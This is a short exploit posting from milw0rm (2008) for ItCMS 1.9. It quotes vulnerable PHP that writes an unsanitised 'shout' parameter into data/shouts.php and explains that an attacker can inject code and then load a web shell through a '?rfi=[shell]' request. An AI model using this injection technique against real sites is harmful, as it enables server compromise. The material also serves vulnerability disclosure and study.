#===========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #===========================================================================================================================# # ItCMS 1.9 Remote File Rewriting # #===========================================================================================================================# # Author : Cod3rZ # #===========================================================================================================================# # Site : http://cod3rz.helloweb.eu # # Site : http://devilsnight.altervista.org # #===========================================================================================================================# # Remote File Rewriting: # #===========================================================================================================================# # /box/minichat/boxpop.php # #===========================================================================================================================# # if ($_POST["shout"]!=""){ # # $shout = $_POST['shout']; # # } else if ($_GET["shout"]!=""){ # # $shout = $_GET["shout"]; # # } # # [...] # # $shout = trim($shout); # # $shout = stripslashes($shout); # # $shout = str_replace ("\r\n", " [br] ", $shout); # # $shout = first($shout); # # [...] # # $FileName="data/shouts.php"; # # if($FilePointer=fopen($FileName, "a+")){ # # fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n"); # # fclose($FilePointer); # #===========================================================================================================================# # So, we can write a malicious code like in the variable $shout, # # and then we go in data/shouts.php?rfi=[shell] # #===========================================================================================================================# # There are many other bugs, find it yourself # #===========================================================================================================================# # Devils Night Corporation - http://devilsnight.altervista.org # #===========================================================================================================================# # milw0rm.com [2008-05-02]